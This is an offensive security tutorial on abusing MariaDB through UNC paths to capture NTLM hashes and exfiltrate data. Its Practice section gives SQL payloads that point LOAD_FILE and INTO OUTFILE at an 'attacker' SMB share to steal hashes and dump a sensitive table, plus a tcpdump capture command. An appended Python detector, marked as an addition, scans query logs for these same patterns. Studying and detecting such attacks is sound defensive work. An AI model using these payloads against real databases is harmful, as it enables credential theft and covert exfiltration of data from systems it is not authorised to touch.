MariaDB UNC Path Attack

Context

This article explains how MariaDB can be exploited using UNC paths for NTLM hash capture and network exfiltration. It assumes familiarity with UNC paths, NTLM authentication, and network exfiltration, as well as previous knowledge of MariaDB out-of-band attacks.

Theory

UNC Path Exploitation in MariaDB

UNC (Universal Naming Convention) paths are a way to specify network resources such as shared files or printers. MariaDB can be made to issue outbound requests to these paths, which presents a security vulnerability: an attacker who can inject a SQL query can use it to trigger such a connection.

NTLM Hash Capture via UNC Paths

NTLM (NT LAN Manager) authentication can be induced by redirecting a MariaDB instance to access a UNC path. If the path points to an attacker-controlled server, that server can capture the NTLM hashes sent by MariaDB as part of the authentication process.

Network Exfiltration Using UNC Paths

Using UNC paths, data can be directed from MariaDB to a controlled server. This method allows an attacker to exfiltrate information such as sensitive database contents without detection by simply routing it to a malicious server under their control.

Practice

MariaDB UNC Path Attack

To execute a MariaDB UNC Path Attack, follow these steps:

  • Initiate a SQL Query: Use the following SQL command to force MariaDB to access a UNC path. This triggers NTLM authentication by attempting to load a file from an attacker's share:

    SELECT LOAD_FILE('\\\\attacker\\share\\file');
    
  • Monitor for Incoming NTLM Hash Requests: Configure your server to capture NTLM hash requests. This typically involves setting up an environment to listen for SMB traffic. Ensure all necessary services are running.

  • Capture Network Traffic: To observe network traffic and NTLM hash exchanges, execute the following command on your server:

    tcpdump -i eth0 port 445
    

Upon successful execution, NTLM hashes should be captured from MariaDB's attempt to access the UNC path.

Data Exfiltration via UNC Path

To exfiltrate data from MariaDB using a UNC path:

  • Execute a Data Exfiltration Query: Use this SQL command to export data from a sensitive database table to a remote UNC path:

    SELECT * INTO OUTFILE '\\\\attacker\\share\\data.txt' FROM sensitive_table;
    
  • Verify Data Reception: Ensure that the data arrives correctly at your server. Monitoring tools or manual checks might be needed to verify the integrity and completeness of the exfiltrated data.

This method allows sensitive data to be stealthily transferred to the attacker's server as specified by the engineered UNC path.
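A defender-side check for the two statements above, added here as an example and not part of the original article: it scans SQL statements for LOAD_FILE or INTO OUTFILE pointed at a UNC path, undoing SQL backslash escaping before matching. The function names and the sample lines (constructed, standing in for a general query log) are assumptions, and the INTO DUMPFILE coverage goes beyond what the article shows.

```python
import re

# File primitives from this page (LOAD_FILE, INTO OUTFILE) plus INTO DUMPFILE,
# each followed by a single-quoted SQL string literal.
FILE_OP = re.compile(
    r"\b(LOAD_FILE\s*\(|INTO\s+OUTFILE|INTO\s+DUMPFILE)\s*'((?:[^'\\]|\\.)*)'",
    re.IGNORECASE,
)
# A \\host\share prefix, matched after the literal has been normalised.
UNC = re.compile(r"^\\\\([^\\]+)\\([^\\]+)")


def literal_to_path(literal):
    # Undo SQL backslash escaping: an escaped pair in the query becomes one
    # character in the path. Then normalise '/' to a backslash, because
    # Windows file APIs accept either separator.
    unescaped = re.sub(r"\\(.)", r"\1", literal)
    return unescaped.replace("/", "\\")


def find_unc_file_access(log_lines):
    # Return (line_no, operation, host, share) for every statement that
    # points a file primitive at a UNC path.
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        for op, literal in FILE_OP.findall(line):
            m = UNC.match(literal_to_path(literal))
            if m:
                op_name = " ".join(op.rstrip("( ").upper().split())
                hits.append((line_no, op_name, m.group(1), m.group(2)))
    return hits


# Constructed sample statements, as they might appear in a general query log.
SAMPLE_LOG = [
    r"SELECT LOAD_FILE('\\\\attacker\\share\\file');",
    r"SELECT * INTO OUTFILE '\\\\attacker\\share\\data.txt' FROM sensitive_table;",
    r"SELECT LOAD_FILE('C:\\ProgramData\\app\\config.ini');",
    r"select load_file('//attacker/share/file');",
    r"SELECT name FROM customers WHERE note = 'see \\\\fileserver\\docs';",
]

if __name__ == "__main__":
    for hit in find_unc_file_access(SAMPLE_LOG):
        print("UNC file access: line %d, %s, host=%s, share=%s" % hit)
```

Only statements that pass a UNC path to a file primitive are reported; the local path on line 3 and the UNC string stored as ordinary data on line 5 are not.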

Tools

  • tcpdump
  • Wireshark

These tools support monitoring and analyzing network traffic, making them crucial for capturing NTLM hashes and verifying data exfiltration during a MariaDB UNC Path Attack.
